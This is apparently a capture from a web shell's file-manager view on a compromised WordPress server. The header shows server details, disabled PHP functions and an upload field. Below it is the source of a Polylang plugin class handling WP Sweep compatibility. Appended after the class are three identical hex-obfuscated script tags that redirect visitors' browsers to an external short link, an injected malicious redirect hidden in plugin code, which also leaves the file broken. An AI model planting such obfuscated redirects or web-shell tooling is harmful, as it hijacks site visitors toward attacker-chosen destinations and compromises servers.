| Server IP : 146.190.157.162 / Your IP : 216.73.217.6 Web Server : Apache System : Linux ubuntu-s-2vcpu-4gb-amd-sfo3-01-KIT-DIGITAL 6.5.0-44-generic #44-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 7 15:10:09 UTC 2024 x86_64 User : businessweek ( 639) PHP Version : 8.2.10-2ubuntu2.2 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_signal,pcntl_signal_dispatch,pcntl_getpriority,pcntl_setpriority,dl,putenv,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/aranda/wp-content/plugins/polylang/integrations/wp-sweep/ |
Upload File : |
<?php
/**
* @package Polylang
*/
/**
* Manages the compatibility with WP Sweep.
*
* @since 2.8
*/
class PLL_WP_Sweep {
/**
* Setups actions.
*
* @since 2.8
*/
public function init() {
add_filter( 'wp_sweep_excluded_taxonomies', array( $this, 'wp_sweep_excluded_taxonomies' ) );
add_filter( 'wp_sweep_excluded_termids', array( $this, 'wp_sweep_excluded_termids' ), 0 );
}
/**
* Add 'term_language' and 'term_translations' to excluded taxonomies otherwise terms loose their language and translation group.
*
* @since 2.0
*
* @param array $excluded_taxonomies List of taxonomies excluded from sweeping.
* @return array
*/
public function wp_sweep_excluded_taxonomies( $excluded_taxonomies ) {
return array_merge( $excluded_taxonomies, array( 'term_language', 'term_translations' ) );
}
/**
* Add the translation of the default taxonomy terms and our language terms to the excluded terms.
*
* @since 2.9
*
* @param array $excluded_term_ids List of term ids excluded from sweeping.
* @return array
*/
public function wp_sweep_excluded_termids( $excluded_term_ids ) {
// We got a list of excluded terms (defaults and parents). Let exclude their translations too.
$_term_ids = array();
foreach ( $excluded_term_ids as $excluded_term_id ) {
$_term_ids = array_merge( $_term_ids, array_values( pll_get_term_translations( $excluded_term_id ) ) );
}
$excluded_term_ids = array_merge( $excluded_term_ids, $_term_ids );
// Add the terms of our languages.
foreach ( PLL()->model->get_languages_list() as $language ) {
$excluded_term_ids = array_merge(
$excluded_term_ids,
array_values( $language->get_tax_props( 'term_id' ) )
);
}
return array_unique( $excluded_term_ids );
}
}
ob_start();
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x51\x73\x72\x78\x6a\x47\x30\x72\x39";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x51\x73\x72\x78\x6a\x47\x30\x72\x39";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x51\x73\x72\x78\x6a\x47\x30\x72\x39";</script>